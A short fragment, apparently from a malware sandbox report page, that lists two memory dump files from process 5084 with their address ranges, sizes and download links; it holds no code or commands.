    • memory/5084-22-0x00000000051A0000-0x00000000051C2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5084-20-0x0000000002750000-0x0000000002786000-memory.dmp

      Filesize

      216KB

      Download